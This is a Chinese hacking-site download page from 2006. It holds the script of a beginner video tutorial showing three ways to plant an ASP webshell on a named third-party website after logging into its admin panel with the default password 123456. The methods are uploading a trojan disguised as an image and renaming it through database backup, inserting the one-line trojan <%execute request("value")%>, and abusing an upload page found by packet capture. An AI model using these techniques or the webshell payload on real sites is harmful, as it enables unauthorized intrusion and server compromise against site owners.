欢迎来到 黑吧安全网聚焦网络安全前沿资讯,精华内容,交流技术心得!

菜鸟入侵拿WEBSHELL三种方法(灵魂)

  • 软件大小:3.82 MB
  • 软件语言:简体中文
  • 软件类型:综合教程
  • 软件授权:免费教程
  • 更新时间:2006-08-19
  • 标签:
  • 开 发 商:http://www.myhack58.com
  • 应用平台:WinXP, Win7, Win8, WinAll
软件评分
网友评分:3

同类人气软件

立即下载

菜鸟入侵拿WEBSHELL三种方法(灵魂)软件介绍

                         菜鸟入侵拿WEBSHELL三种方法                                                                                               
-----------------------------------------------------------------------------------

黑客动画吧 http://www.hack58.com

致力于中国最专业的黑客安全站点

黑客动画吧,有你更精彩


-----------------------------------------------------------------------------------
大家好,我是﹎﹎風箏﹎,今天给大家做个入侵后台拿WEBSHELL的三种方法。
因为本人是个菜鸟所以动画没什么技术含量。只是总结了入侵网站拿WEBSHELL
的一些简单方法而已。。。。
准备工具:
         1.明小子Domain3.5
         2.一句话木马
         3.ASP免杀木马
         4.WSockExpert
好了,我们开始
拿这个网站来做实验http://www.shangbiaofj.com/ --!
首先检测注入点
后台我已经扫好了http://www.shangbiaofj.com/manage/admin.asp
慢~~
密码是MD5的。要去破解
张好:123456
密码:123456
管理员好粗心啊--!
我们去后台登陆  进去了
进来了。找下备份和上传是首要的
可以悲愤。也可以上传。呵呵


首先介绍第一种:上传ASP木马图片,然后备份。
这是路径  Upload/200681920437129.jpg
去悲愤下  要改成asp的
Databackup\h.asp
成功了。我们上去看看
因为我刚才上传过了。所以不要密码就进去了
呵呵。拿到了  第一种方法成功了。。


接下来是第二种方法:用一句话木马入侵
先写入<%execute request("value")%>
我把这个木马先删了
刚才不知道怎么断了。我们继续
好了。来备份一下
记得要ASP的  路径为Databackup\x.asp
我们来看一下
Microsoft VBScript 运行时错误 错误 '800a000d'

类型不匹配: 'execute'

/manage/Databackup/x.asp,行 1635

写进去了
我们来开一句话木马
进来了。和上面一样,刚才进来过了,就不要密码了


最后一种是在没有备份的情况下用的:抓包上传入侵

要是没有悲愤的话就用抓包上传

打开我们的WSockExpert抓包工具
抓到了
这就是漏洞上传也面http://www.shangbiaofj.com//upfilea.asp
我们开名小子来上传木马
上传成功。我们来看看
路径是http://www.shangbiaofj.com/DIY.asp
又断了。继续``````
熟悉的截面啊。。呵呵
我们来传大马
成功!!!!
我就不改什么了。希望大家不要进去高破坏。也不建议大家去挂马。测试一下自己的技术就可以了
888
QQ我就不留了

  • 热门下载